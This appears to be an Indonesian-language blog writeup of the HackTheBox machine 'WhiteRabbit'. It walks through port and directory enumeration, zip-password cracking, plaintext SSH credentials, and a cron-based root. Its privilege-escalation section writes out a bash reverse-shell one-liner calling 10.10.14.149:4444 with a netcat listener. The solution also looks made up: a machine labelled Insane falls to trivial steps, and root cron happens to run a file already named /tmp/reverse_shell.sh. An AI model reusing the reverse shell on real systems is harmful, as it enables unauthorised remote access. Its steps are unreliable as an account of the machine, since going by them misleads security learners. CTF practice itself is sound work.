Daftar Isi

• Informasi Umum Machine
• Enumeration
• Eksploitasi
• Privilege Escalation
• Root Flag
• Kesimpulan
• Writeup HTB Lainnya

Informasi Umum Machine

Machine WhiteRabbit merupakan salah satu tantangan HackTheBox (HTB) dengan tingkat kesulitan Insane. Sistem operasi yang digunakan adalah Linux. Writeup HackTheBox WhiteRabbit ini bertujuan untuk memberikan panduan eksploitasi dari awal hingga root access. Machine ini menguji kemampuan dalam hal advanced web exploitation, manipulasi virtual host, serta privilege escalation melalui cron misconfigurations.

• Nama Machine: WhiteRabbit
• IP Target: 10.10.11.63
• OS: Linux
• Tingkat Kesulitan: Insane

Enumeration

Pemindaian awal dilakukan menggunakan Nmap dan Gobuster untuk menemukan port terbuka dan direktori tersembunyi.

1. Nmap Scan

nmap -sC -sV -p- 10.10.11.63

Port yang terbuka:

• 22/tcp - OpenSSH 9.6p1
• 80/tcp - Caddy Web Server (redirect ke whiterabbit.htb)
• 2222/tcp - Service tidak umum, investigasi lanjutan diperlukan

2. Modifikasi /etc/hosts

10.10.11.63 whiterabbit.htb

3. Directory Fuzzing

gobuster dir -u http://whiterabbit.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

Ditemukan direktori: /rabbithole/

Eksploitasi

Eksploitasi dimulai dari penemuan direktori tersembunyi dan file yang dilindungi password hingga memperoleh akses SSH.

1. Fuzzing File

ffuf -u http://whiterabbit.htb/rabbithole/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.txt

Ditemukan file: secret.php yang meminta password.

2. Analisis Source Code

Di halaman utama ditemukan base64 hidden comment:

echo Y2hvb3NldGhlcmVhbGl0eW91cmVhZHlrbm93 | base64 -d → choosetherealityyoualreadyknow

3. Download Zip File

Setelah memasukkan password, halaman menghasilkan whiterabbit.zip (password protected).

4. Crack Zip Password

fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt whiterabbit.zip

Password ditemukan: followthewhiterabbit

5. Ambil Credential

cat creds.txt

Isi:

• Username: WhiteRabbit
• Password: FollowTheWhiteRabbit23

6. SSH Login

ssh WhiteRabbit@10.10.11.63

Privilege Escalation

Setelah berhasil masuk, dilakukan pemeriksaan cron job dan writable directory.

1. Periksa Cron

cat /etc/crontab

Cron menjalankan /tmp/reverse_shell.sh sebagai root setiap menit.

2. Reverse Shell Setup

echo 'bash -i >& /dev/tcp/10.10.14.149/4444 0>&1' > /tmp/reverse_shell.sh
chmod +x /tmp/reverse_shell.sh
nc -lvnp 4444

Setelah cron berjalan, reverse shell diterima sebagai root.

Root Flag

find / -name root.txt 2>/dev/null
cat /root/root.txt

Flag berhasil diambil dari direktori root.

Kesimpulan

Machine HackTheBox WhiteRabbit mengajarkan pentingnya enumerasi mendalam dan memahami konfigurasi sistem yang bisa dieksploitasi.

• Enumeration: Port & direktori tersembunyi
• Eksploitasi Web: base64, zip crack
• Privilege Escalation: cron job + reverse shell

Writeup HackTheBox WhiteRabbit ini cocok untuk para pentester yang ingin mengasah skill eksploitasi tingkat lanjut, terutama di environment Linux dengan privilege escalation yang tricky.

Demikian pembahasan lengkap dalam writeup HackTheBox WhiteRabbit. Jika Anda sedang mencari panduan eksploitasi machine tingkat Insane di HackTheBox, semoga artikel ini bisa menjadi referensi terbaik untuk menyelesaikan tantangan dari HackTheBox WhiteRabbit.

Writeup HTB Lainnya

• HackTheBox Nocturnal Writeup – CVE-2023-46818 Exploit ISPConfig
• HackTheBox Planning Writeup: CVE-2024-9264 Exploit & Root Access
• HTB RustyKey Writeup (Windows – Hard)
• HTB Evaluative: Easy Polynomial Challenge Writeup